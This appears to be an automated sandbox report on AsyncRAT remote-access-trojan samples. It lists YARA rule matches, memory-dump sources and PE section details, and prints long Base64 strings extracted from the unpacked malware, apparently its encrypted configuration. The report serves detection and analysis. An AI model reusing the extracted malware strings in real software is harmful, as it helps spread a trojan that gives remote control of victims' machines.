Source: 21.2.Taskshell.exe.2b34d78.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 21.2.Taskshell.exe.2b34d78.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 33.2.Taskshell.exe.319ecd8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 33.2.Taskshell.exe.319ecd8.0.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 33.2.Taskshell.exe.319ecd8.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 21.2.Taskshell.exe.2b28e9c.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 21.2.Taskshell.exe.2b28e9c.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 21.2.Taskshell.exe.2b28e9c.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 37.2.Taskshell.exe.304befc.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 37.2.Taskshell.exe.304befc.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 37.2.Taskshell.exe.304befc.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 33.2.Taskshell.exe.319ecd8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 33.2.Taskshell.exe.319ecd8.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 33.2.Taskshell.exe.319ecd8.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000009.00000002.1793564770.0000000003021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000021.00000002.2026862188.000000000319D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000021.00000002.2026862188.000000000319D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000000.00000002.1760909850.0000000003507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000000.00000002.1760909850.0000000003507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000009.00000002.1790797223.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000A.00000002.1858382198.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 0000000A.00000002.1858382198.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000025.00000002.2090225147.000000000304A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000025.00000002.2090225147.000000000304A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000014.00000002.2954261509.0000000003491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000015.00000002.1918167976.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000015.00000002.1918167976.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: PXUVmodpCYqRIPQ.exe PID: 6792, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: PXUVmodpCYqRIPQ.exe PID: 7204, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: xcsUjVN.exe PID: 7268, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: xcsUjVN.exe PID: 7728, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: Taskshell.exe PID: 7756, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: Taskshell.exe PID: 3852, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: Taskshell.exe PID: 7576, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: PXUVmodpCYqRIPQ.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xcsUjVN.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Taskshell.exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, fdAXeKEwYgt.cs Base64 encoded string: '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
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, fdAXeKEwYgt.cs Base64 encoded string: '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
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, fdAXeKEwYgt.cs Base64 encoded string: 'VX85ofDFWkCoyWEKRJFZp3r07oW8cd9Cgfy1ycj7xkMMRFRaA1UQQRbwjVOZWNgjHhILZQD5cEtpXvrkLJUB4Q==', '/fukGBHOuWcPGT0vYOmFItmTUsnykGh53DOgG5H3sqZHUlI0s2/4HYmjAEdnomAKNwdoqQl14Y1E27dl23vgwis9wxjUrj9xTzxLEsFzka0DoOV+9zEiyW9sRqPK6RJdDyLNjPV1fL2xzba7aIkJ5E2l9vM5Km+GDLWSYd5uBTcSSOhQa9EnjFWfyYl46UfqhpgtZ5qTqEY0vBEw2gTno/vnwwYLUbVeUP95YOUU7E6DXDlISbfLlb1yCaB9AGbGwOoPrkwbqcNTtVAR86IHT05yg07CtiMMyclfKklcEBAawU8djhSAGjIfSucEVV+Vj6G4SbRKpth0tUDWqSsW6S2mpL8S2rTJfEx/cAlFtiIu2re6PH/zrFpYvRww02Au5tOW1+ph1o4KbsDtBQ7KAg+wPshqOy7QacW7VffB3x9Fa3LUySJpLzLfNcNcR+nb7cxGevs71WEQq0JqAxc4wiBiMLYB37yvVMPahGaoMrJUvdcaCSJ727gHH5maL7SjMLUZ2dHXz+oh3dtHIlPiCPiw8ItH3/U3yJIF0Os9zVAgDpGnjfLDfN7+xu501i/ziCG9JjUC+kVZ/oXTr+jjFGhWD+Z8Rr3kSRpc1A7FCDt2gohGxWteAdY6JYnSJXthuoQlXnlmD5wXDRwo226CaUBes9vXsOr8IkCCHpIoRBV1BpitoqvlmBH2RTPL4foXuaVUIYwwSPGwAw6ef9uwlsvaVPDzDnIQSOrPK2b9HOhwT4en6zxQCECqHVaz/lTGAXdvaEXoYyqIX+A+tVdfMZUS+Okb9zfYhH8fwXdOz1BD3vALUKTJEpNcM/L+bSPrQpwSk+Vb9NecWsvfrwFW/svmU+WrjHZj/eki5q